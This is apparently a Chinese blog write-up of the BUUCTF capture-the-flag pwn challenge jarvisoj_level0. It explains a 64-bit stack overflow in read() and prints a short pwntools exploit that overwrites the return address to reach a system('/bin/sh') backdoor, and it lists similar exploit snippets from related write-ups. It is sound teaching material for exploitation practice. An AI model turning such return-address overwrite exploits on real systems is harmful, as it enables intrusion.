[BUUCTF-pwn]——jarvisoj_level0

最新推荐文章于 2024-03-28 11:29:55 发布

原创最新推荐文章于 2024-03-28 11:29:55 发布 · 2.7k 阅读

0 ·

CC 4.0 BY-SA版权

BUUCTF 专栏收录该内容

89 篇文章

订阅专栏

本文分享了如何在jarvisoj_level0挑战中，通过64位栈溢出利用技巧，找到system函数地址并构造exploit payload。作者详细描述了IDA分析、栈溢出原理、参数覆盖和最终的exploit实现过程。

[BUUCTF-pwn]——jarvisoj_level0

题目地址：https://buuoj.cn/challenges#jarvisoj_level0
题目：
还是先下载下来在Linux上checksex一下，基本确实又是栈溢出了。

64位，所以我们用64位的IDA打开，没什么有用的信息，点开vulnerable_function函数

发现栈溢出的read函数，前面为0意味着标准读入，后面的长度也可以。没毛病就是这个地方了。

再翻翻其他函数，发现了我们想要的system函数。找到位置，和需要覆盖的返回地址。看过我之前的博文的人都知道，我比较喜欢system压参的位置。

再看看buf这个局部变量，先想要覆盖需要0x80 + 0x8的距离

在这里插入图片描述

expolit

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()

在这里插入图片描述

点赞点赞点赞，兄弟们、姐妹们、家人们！！！ 😃

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

12
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

807

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

BUUCTF PWN wp--jarvisoj_level0

最新发布

2302_81740139的博客

08-31

577

PIE（Position Independent Executable）是指位置无关的可执行文件，如果启用了 PIE，程序在每次运行时，加载地址都会随机化，以增加攻击者预测内存布局的难度。这里显示未启用 PIE，这意味着程序的加载地址是固定的（这里是 0x400000），攻击者更容易预测程序的内存布局，从而进行攻击。这里显示 NX 已启用，这意味着程序不允许在数据段中执行代码，这可以有效防止某些代码注入类型的攻击（如传统的栈溢出攻击）。本题与之前的题目类型差不多，是栈溢出问题）第三步编写脚本。

2 条评论您还未登录，请先登录后发表或查看评论

BUUCTF jarvisoj_level0

、moddemod

06-11

802

exp from pwn import * context(log_level='debug', arch='amd64') p = remote('node3.buuoj.cn', 26990) proc_name = './level0' # p = process(proc_name) # elf = p.elf elf = ELF(proc_name) bin_sh_str = 0x400684 system_plt = elf.plt['system'] pop_rdi_ret = 0x40.

CTF buuoj pwn-----第6题:jarvisoj_level0

bing_Max的博客

09-02

1197

CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析，IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机，下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'

buuctf之jarvisoj_level0

weixin_54452942的博客

03-28

1751

64位(system_addr+1)的奥秘

buuctf jarvisoj_level0

carol2358的博客

04-17

718

栈溢出，然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...

[BUUCTF]PWN------jarvisoj_level0

BangSen1的博客

01-18

418

jarvisoj_level0 例行检查，64bit，开启NX保护。 nc一下，出现了Hello world,接着让我们输入，没有有用的信息。 ‘用IDA打开，看到了/bin/sh 双击跟进，Ctrl+x查看被什么调用，找到了后门，所以shell_addr=0x400596 查看主函数，寻找输入点。可以看到buf的大小是0x80，但它读取时只读了0x20，可以溢出，覆盖返回地址为后门地址既可 exp flag ...

[BUUCTF-pwn]——jarvisoj_level1

Y_peak的博客

03-17

634

[BUUCTF-pwn]——jarvisoj_level1 题目地址：https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E

[BUUCTF-pwn]——jarvisoj_level2

Y_peak的博客

02-10

1507

[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0

[BUUCTF]PWN——jarvisoj_level1

BangSen1的博客

03-31

311

jarvisoj_level1 例行检查，32位，未开启任何保护。运行一下，给了一个地址 0xffef96b0 用IDA打开，查看主函数查看function函数。由此我们可以知道 bufadddr= 0xffef96b0, buf存在溢出漏洞。由于题目并没有开启任何保护。所以我们可以先通过read读入shellcode，然后利用溢出漏洞将ret覆盖为buf参数地址（此时buf里是shellcode）去执行即可获取shell。 ...

[BUUCTF]PWN——jarvisoj_level3

mcmuyanga的博客

10-28

1314

jarvisoj_level3 附件步骤例行检查，32位，nx保护运行一下程序 32位ida载入，shift+f12没有看到程序里有可以直接利用的后面函数，根据运行时的字符串找到了程序的关键函数参数buf明显的溢出漏洞，使用ret2libc的办法去获取shell 利用过程： 0x1 利用wire函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_p

[BUUCTF]PWN8——jarvisoj_level0

mcmuyanga的博客

08-26

681

[BUUCTF]PWN8——jarvisoj_level0 题目网址：https://buuoj.cn/challenges#jarvisoj_level0 步骤：例行检查，64位，开启了NX保护 nc一下，看看程序的大概执行流程，回显Hello，world之后让我们输入用64位ida打开，shift+f12查看字符串，发现了 system 和 /bin/sh 双击跟进，ctrl+x找到调用 /bin/sh 的函数，找到了程序里的后门，shell_addr=0x400596 根据

[buuctf]jarvisoj_level0

逆向萌新的博客

05-30

625

[buuctf]jarvisoj_level0

BUUCTF-Pwn-jarvisoj_level0

餐桌上的猫

02-12

400

题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)

BUUCTF-PWN-jarvisoj_level0

Henlenl的博客

05-12

220

文章目录查看文件信息IDA 分析exp 查看文件信息 64位elf文件 IDA 分析我们来到main()函数再进入vulnerable_function()函数典型的read()栈溢出漏洞,buf有0x80 [rbp + 80h] 所以如果要覆盖的话需要0x80 + rbp本身的8字节同时我们发现 callsystem函数地址为 0x400596，所以payload = ‘a’ * (0x80 + 8) + p64(0x400596) exp from pwn import *

jarvisoj_level0

weixin_51298357的博客

01-06

391

jarvisoj_level0 拿到题之后先在命令行里查看文件，是一个64位的。把他放在64位的ida下f5看一下伪代码 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hTJ57A2u-1609934613627)(C:\Users\li\Desktop\临时\QQ截图20210106184228.png)] 其实只是一句hello world，没有什么太多信息。可以看一下返回的vulnerable_function函数里是什么。然后逐个检查，最后看见了这个callsyst

jarvisoj_level1

08-28

很抱歉，我无法回答这个问题。123 #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新，欢迎共享，不要白嫖哦](https://download.youkuaiyun.com/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]